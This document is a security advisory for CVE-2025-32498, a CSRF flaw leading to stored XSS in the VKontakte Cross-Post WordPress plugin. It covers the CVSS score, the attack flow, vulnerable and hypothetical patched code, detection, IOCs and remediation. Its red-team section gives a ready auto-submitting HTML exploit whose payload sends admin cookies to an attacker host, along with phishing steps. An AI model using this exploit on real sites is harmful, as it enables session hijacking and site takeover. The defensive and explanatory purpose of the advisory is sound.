CVE-2025-32498
Executive Summary
CVE-2025-32498 is a Cross-Site Request Forgery (CSRF) vulnerability in the VKontakte Cross-Post WordPress plugin (slug: vkontakte-cross-post) by developer oleglark, affecting versions from n/a through 0.3.2. The vulnerability allows an attacker to perform unauthorized actions on behalf of an authenticated administrator, leading to Stored Cross-Site Scripting (XSS). This means an attacker can craft a malicious request that, when executed by an admin, injects persistent JavaScript into the plugin’s settings or posts, potentially compromising the entire WordPress site.
The plugin is designed to automatically cross-post content from a WordPress site to VKontakte (VK), a popular Russian social network. The CSRF flaw exists because the plugin does not implement proper nonce validation or origin checks on state-changing requests, such as saving API tokens or modifying cross-posting rules. Combined with the lack of output sanitization, this enables stored XSS.

Supply Chain & Package Security
This vulnerability affects a WordPress plugin distributed via the official WordPress Plugin Directory. While not an NPM, PyPI, Go, or Ruby package, the same supply chain risks apply: users who install this plugin from the directory are trusting the developer’s code. Since the plugin is unpatched and the vendor’s status is unknown, any site running version 0.3.2 or earlier is at risk. There is no known fork or patch available from the community.
CVSS Breakdown & Threat Level
- CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L
- Base Score: 7.1 (High)
- Attack Vector: Network (AV:N) – The attack is performed remotely.
- Attack Complexity: Low (AC:L) – No special conditions required.
- Privileges Required: None (PR:N) – Attacker does not need authentication.
- User Interaction: Required (UI:R) – The victim (admin) must click a link or visit a malicious page.
- Scope: Changed (S:C) – The vulnerability can impact resources beyond the vulnerable component (e.g., inject XSS into the WordPress admin).
- Confidentiality Impact: Low (C:L) – Limited data exposure.
- Integrity Impact: Low (I:L) – Limited modification of data.
- Availability Impact: Low (A:L) – Limited service disruption.
Threat Level: High. The combination of CSRF and stored XSS allows an attacker to hijack admin sessions, steal cookies, deface the site, or install backdoors.
Deep Dive & Mechanics
The vulnerability resides in the plugin’s administrative interface, specifically in the settings page where users configure VKontakte API credentials and cross-posting rules. The plugin fails to implement a CSRF token (nonce) on the form submission handler. Additionally, user-supplied input (e.g., API token, group ID, or custom message) is not sanitized before being stored in the WordPress options table and later rendered in the admin panel.
Attack Flow:
- An attacker crafts a malicious HTML page containing a hidden form that submits a request to the vulnerable WordPress admin-ajax.php or options.php endpoint.
- The form includes payloads such as
<script>alert('XSS')</script>in a field likevk_api_token. - The attacker lures an authenticated WordPress administrator to visit the malicious page (e.g., via phishing email or a compromised third-party site).
- The admin’s browser automatically submits the form (due to CSRF), and the plugin saves the malicious input without validation.
- When the admin later views the plugin settings page, the stored XSS payload executes, allowing the attacker to perform actions like creating new admin users, exfiltrating data, or injecting malware.
Root Cause: Missing CSRF nonce and lack of input sanitization in the plugin’s settings save routine.
Vulnerable vs. Patched Code
Since no patch is available, we compare the vulnerable code pattern to a hypothetical secure implementation.
Vulnerable Code (v0.3.2):
// In admin.php or similar
function vk_cross_post_save_settings() {
// No nonce check
update_option('vk_api_token', $_POST['vk_api_token']);
update_option('vk_group_id', $_POST['vk_group_id']);
// ... other fields
}
Patched Code (Hypothetical):
function vk_cross_post_save_settings() {
// Add nonce verification
if ( ! isset( $_POST['_wpnonce'] ) || ! wp_verify_nonce( $_POST['_wpnonce'], 'vk_cross_post_settings' ) ) {
wp_die( 'CSRF validation failed.' );
}
// Sanitize input
$api_token = sanitize_text_field( $_POST['vk_api_token'] );
$group_id = sanitize_text_field( $_POST['vk_group_id'] );
update_option('vk_api_token', $api_token);
update_option('vk_group_id', $group_id);
}
Exploitation & Lab Setup
Red Team (Offensive)
Prerequisites:
- A WordPress site with VKontakte Cross-Post plugin v0.3.2 installed and an admin logged in.
- Attacker-controlled web server to host the CSRF page.
Exploit HTML (csrf_exploit.html):
<html>
<body>
<form action="http://target-site.com/wp-admin/options-general.php?page=vk-cross-post-settings" method="POST">
<input type="hidden" name="vk_api_token" value="<script>new Image().src='http://attacker.com/steal?cookie='+document.cookie</script>">
<input type="hidden" name="vk_group_id" value="12345">
<input type="hidden" name="submit" value="Save">
</form>
<script>document.forms[0].submit();</script>
</body>
</html>
Steps:
- Host the HTML on attacker-controlled server.
- Send phishing email to admin with link to the HTML.
- Admin visits the page, form auto-submits, and the XSS payload is stored.
- When admin reloads the settings page, the script executes, sending cookies to attacker.
Blue Team (Defensive)
Detection:
- Monitor for unusual POST requests to
/wp-admin/options-general.phpwith parameters likevk_api_tokencontaining script tags. - Look for sudden changes to the
vk_api_tokenoption in the database. - Use WAF rules to block requests with
<script>in POST parameters.
Honeypot:
- Deploy a fake admin user and monitor for CSRF-like requests to plugin settings.
Indicators of Compromise (IOCs)
- Network: POST requests to
/wp-admin/options-general.php?page=vk-cross-post-settingswith suspiciousvk_api_tokenvalues. - File: Modified
wp_optionstable entries forvk_api_tokencontaining JavaScript. - Log: WordPress debug log entries showing unexpected option updates.
- Behavior: New admin users created without legitimate action, or unexpected outbound connections to attacker domains.

Remediation & Mitigation
Immediate Actions:
- Disable the plugin until a patch is released.
- If disabling is not possible, implement a Web Application Firewall (WAF) rule to block requests containing
<script>invk_api_tokenparameter. - Add CSRF nonce manually by editing the plugin’s admin code (if you have development resources).
Long-term:
- Monitor the WordPress Plugin Directory for an official update.
- Consider switching to an alternative cross-posting plugin with active maintenance.
- Educate administrators about phishing risks and the importance of verifying plugin updates.
Workaround Code (Add to theme’s functions.php):
add_action('admin_init', function() {
if (isset($_POST['vk_api_token'])) {
if (!wp_verify_nonce($_POST['_wpnonce'], 'vk_cross_post_settings')) {
wp_die('CSRF detected.');
}
$_POST['vk_api_token'] = sanitize_text_field($_POST['vk_api_token']);
}
});
